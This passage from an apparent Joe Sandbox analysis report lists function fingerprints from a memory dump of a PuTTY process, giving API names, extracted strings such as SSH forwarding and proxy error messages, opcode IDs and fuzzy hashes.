                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %s$%s%s$A46$LRD$Specified forwarding already exists$You need to specify a destination addressin the form "host.name:port"$You need to specify a source port number
                      • API String ID: 0-44983218
                      • Opcode ID: ba424b58cbbb99aae8b14aad6f6064a995736501febaf7f6e00a0bdb9dd836ec
                      • Instruction ID: 22914173de34b22c61c70ac131b6e9173a8ed16e94aa3f465c9726b034de9722
                      • Opcode Fuzzy Hash: ba424b58cbbb99aae8b14aad6f6064a995736501febaf7f6e00a0bdb9dd836ec
                      • Instruction Fuzzy Hash: 09B1F353B3854261FE51EB32A9115BB1B90AF85BC4FA41431ED0ECB796DE3CE842E748
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _get_daylight$InformationTimeZone_invalid_parameter_noinfo
                      • String ID: @
                      • API String ID: 3482513350-2766056989
                      • Opcode ID: dca634d6c3a5b7d34b55d3a849be1959882c23d7e5e2232627116e95c2f1e3cd
                      • Instruction ID: 21c3b2f577be21f6e37a817985e7bc1d3ac476d23feff1811f525313e323c970
                      • Opcode Fuzzy Hash: dca634d6c3a5b7d34b55d3a849be1959882c23d7e5e2232627116e95c2f1e3cd
                      • Instruction Fuzzy Hash: 9E518333A2864296E750DF36E8814AA7F61FB48798F644135FA4DC7B96DF3CE8019708
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/ssh/sharing.c$Bad packet length %u$Truncated GLOBAL_REQUEST packet$cancel-tcpip-forward$err != NULL$upstream added want_reply flag
                      • API String ID: 0-3127662328
                      • Opcode ID: 991be26201f74181bba88df3678a337c7b480657ca93a9f6299da5e586af8475
                      • Instruction ID: 152b52547d67f70fd611b7b94494411f82f3eb2b013f64a430f28d7fabc4f829
                      • Opcode Fuzzy Hash: 991be26201f74181bba88df3678a337c7b480657ca93a9f6299da5e586af8475
                      • Instruction Fuzzy Hash: 8DE1D223A18A8195EB20DB25E4507ABBBA0FBC8B84F644031DF8E87796DF7CD845D744
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/proxy/sshproxy.c$backvt->flags & BACKEND_NOTIFIES_SESSION_START && "Backend provides NC_HOST without SESSION_START!"$false && "bad SSH proxy type"$saved session '%s' is not an SSH session$saved session '%s' is not launchable$unable to open SSH proxy connection: %s
                      • API String ID: 0-1306285275
                      • Opcode ID: 9ef69af328c5a2eb72a18165583f3a624f4cbe1c915d5e5e8a5a22084f012d1b
                      • Instruction ID: 1f35c71d287b54cefe743aa87ed9cf1e51dfdc1c873321fd61181697e81f037e
                      • Opcode Fuzzy Hash: 9ef69af328c5a2eb72a18165583f3a624f4cbe1c915d5e5e8a5a22084f012d1b
                      • Instruction Fuzzy Hash: C5C1A527A2868261EA549B32E4503BF6B51EFC5BD0F604035DF8E87B97DE3CE8419304
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
                      • String ID:
                      • API String ID: 2660700835-0
                      • Opcode ID: e40370b0eb4c02b40ff289f01bc8dc88bbf23639b1323524b1364f8764570233
                      • Instruction ID: 0400c8cf8d2eeed771b1294043881038b566d5cecb4cfc4c890e145ac81b06da
                      • Opcode Fuzzy Hash: e40370b0eb4c02b40ff289f01bc8dc88bbf23639b1323524b1364f8764570233
                      • Instruction Fuzzy Hash: 6D31E333629B8156F7248B35F81466B3B94FB99760F644134CE4E82BA4DF3CE940DB08
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Clipboard$Data$CloseMessageOpenSend
                      • String ID:
                      • API String ID: 2111581930-0
                      • Opcode ID: e93e0cf60494fe75f915791a3c77afe7e720d1734b7674f2dfd41008d92a8430
                      • Instruction ID: 68e216f4e729ed05daefe298cf196324e02e2237f197809f8b0001f9f4f1fff5
                      • Opcode Fuzzy Hash: e93e0cf60494fe75f915791a3c77afe7e720d1734b7674f2dfd41008d92a8430
                      • Instruction Fuzzy Hash: 0AF0A712F39563A3FB942B71684877629929F44B40F745038C81EC63D8CD1DED85DB19
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$chars != NULL$nchars_used < nchars_got
                      • API String ID: 0-2160977139
                      • Opcode ID: 6bda750f2f829f912fe00ae960369c8f33894d338bf28a3c136aa815d228c365
                      • Instruction ID: 7a554dd968e8b2831cee9df21aaa1b219db2b41773919675100fa729c91bafe3
                      • Opcode Fuzzy Hash: 6bda750f2f829f912fe00ae960369c8f33894d338bf28a3c136aa815d228c365
                      • Instruction Fuzzy Hash: 36320633A2D69589FBA08B35D8487BA3F95EB41784F664135CA5DCB7D1EE3CE8408708
                      APIs
                      • FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF67860DCDB), ref: 00007FF678617B7B
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF67860DCDB), ref: 00007FF678617BA4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
                      • API String ID: 3479602957-1777221902
                      • Opcode ID: 934d5ca9fc914f20fd68ae67c817c39f5743779c9430b7da65df0996f959670f
                      • Instruction ID: c6acc2d7c43c250eefc9d7b58e6b05536e4a06ae44775105005214ba2417cca5
                      • Opcode Fuzzy Hash: 934d5ca9fc914f20fd68ae67c817c39f5743779c9430b7da65df0996f959670f
                      • Instruction Fuzzy Hash: 7B318A22F2C64255EA509B35F4413B76B61EF84744F204131EA8DC779AEF7CEC459B08
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirstWindow
                      • String ID: Pageant
                      • API String ID: 2475344593-3220706369
                      • Opcode ID: 46b9dcd90dc30509f8ce6d4eeb7586a96e96ad226e4fda942849ad5c994bb184
                      • Instruction ID: 51fcc44d9c943aca926a894473c38009ed929ee9daa15f7c54740e7374601119
                      • Opcode Fuzzy Hash: 46b9dcd90dc30509f8ce6d4eeb7586a96e96ad226e4fda942849ad5c994bb184
                      • Instruction Fuzzy Hash: 7601A522F2924261FD105B35A8453BB1B505F597A0FA40231CD1D867D5DD2CDCC6A708
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$len <= pool->nw$p > 0$x->nw > 0$x->w[0] & 1
                      • API String ID: 1949149715-820863981
                      • Opcode ID: e0b20f5a8d21874f3a97cb2b2b1057c890e0fd874627e0a1142ccee4fd5db7f8
                      • Instruction ID: bf84aef1c43e16ec425a434cf6577be088e1e102817b7f24082c3c32f9f4f6c2
                      • Opcode Fuzzy Hash: e0b20f5a8d21874f3a97cb2b2b1057c890e0fd874627e0a1142ccee4fd5db7f8
                      • Instruction Fuzzy Hash: B932D232B28B9591DA20DF25E4403AA7764FB84BE4F544232DAAD43BD9EF3CD581D704
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Color$ModeObjectSelectText
                      • String ID:
                      • API String ID: 3594386986-0
                      • Opcode ID: 062e9b49704ff532ccb08a301ad4696c212a399bcaca2ce98464616b989bc9b3
                      • Instruction ID: effce4c54e521fe6708d0aa09ca98384bbbbe443b6249cfb2ef9837a6ee710fd
                      • Opcode Fuzzy Hash: 062e9b49704ff532ccb08a301ad4696c212a399bcaca2ce98464616b989bc9b3
                      • Instruction Fuzzy Hash: 3E812627E2C62586FB758B26A8C037A7A92BB94781F304035DD4EC3794DE7CED40AA54
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Color$ModeObjectSelectText
                      • String ID:
                      • API String ID: 3594386986-0
                      • Opcode ID: a8f5b5b0e585cb72b3f3f779b8361df6a7e167cc07a1f26b4896fd50d5f44db0
                      • Instruction ID: aad9547ea6106e16ea43ec0ff5057ed3b071bf885c46a77f6dcc575993286631
                      • Opcode Fuzzy Hash: a8f5b5b0e585cb72b3f3f779b8361df6a7e167cc07a1f26b4896fd50d5f44db0
                      • Instruction Fuzzy Hash: AA812727E2C62586FB658B2AA8C037A7A92BB94781F304035DD4DC3794DE7CED409A54
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Color$ModeObjectSelectText
                      • String ID:
                      • API String ID: 3594386986-0
                      • Opcode ID: 7965013e65fe39ea2ae5d9b7d588d824beffc7c579ab59e583ffeacae1a9d986
                      • Instruction ID: e3ca80d581a85d02eaa40d4fe496eec6d32c25ffb714dc6c6cb2dda2b873313a
                      • Opcode Fuzzy Hash: 7965013e65fe39ea2ae5d9b7d588d824beffc7c579ab59e583ffeacae1a9d986
                      • Instruction Fuzzy Hash: F1812737E2C62586FB658B26A88037A7A92FB94781F304035DD4DC3794DE7CED409B54
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _get_daylight$_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 1286766494-0
                      • Opcode ID: 1eb53fdb1f7e85100b90bf35bdf4ec4e651609bdb89da2f09d3bd1ddb09729b4
                      • Instruction ID: 02061946951f237fb74623b7b9d27d120aff392e00c0518f791fff46f9a3c1fd
                      • Opcode Fuzzy Hash: 1eb53fdb1f7e85100b90bf35bdf4ec4e651609bdb89da2f09d3bd1ddb09729b4
                      • Instruction Fuzzy Hash: 6B92D233A28652D6E7249F35D45017B2FA5FB45788F244036EB8987A95DF3DED00E30A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: GetVersionExA$kernel32.dll
                      • API String ID: 190572456-3521452493
                      • Opcode ID: 0c14bb31d7d74514721674b52997aae77921c1310d88e033a61af6d90ed3c4d9
                      • Instruction ID: e434a530624342c4a307e0c5824aefe41091f9dcba7b827c935a72426634c1a2
                      • Opcode Fuzzy Hash: 0c14bb31d7d74514721674b52997aae77921c1310d88e033a61af6d90ed3c4d9
                      • Instruction Fuzzy Hash: 7F316F23D2D78295F620CB25B8503776FA1ABA9304F209235E59C862A5DF7CE9909F18
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: !mp_cmp_hs(remainder, d)$!mp_eq_integer(d, 0)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c
                      • API String ID: 1949149715-1331618967
                      • Opcode ID: c92e9b05d724342b17149865c022194c84f2cdf934dcf91f9481abecd86be9e1
                      • Instruction ID: eb2b82fb7e31a3adf5fa6fa3b2fb5da226c417e2eb4f211bbea02046939b9750
                      • Opcode Fuzzy Hash: c92e9b05d724342b17149865c022194c84f2cdf934dcf91f9481abecd86be9e1
                      • Instruction Fuzzy Hash: 92A22463B28B8596EA10DF61D6143BF6752EB45FC0F198531DE1D8B786DE3CE8819308
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$word < x->nw$x0->nw == x1->nw
                      • API String ID: 1949149715-4037912331
                      • Opcode ID: 43eaca89571b15201c73cdb88dec1c6938a79bfea65ec062044a08198682b48d
                      • Instruction ID: 77bd1f969e3d5b46d43aa5b5ab122497e1b1a0f81a2e11b50e021e1509b5e33b
                      • Opcode Fuzzy Hash: 43eaca89571b15201c73cdb88dec1c6938a79bfea65ec062044a08198682b48d
                      • Instruction Fuzzy Hash: FF82CD73B29B8591EA10CB26D45427F6B62FB48FD0F298531CE5E87795EE38E881D304
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
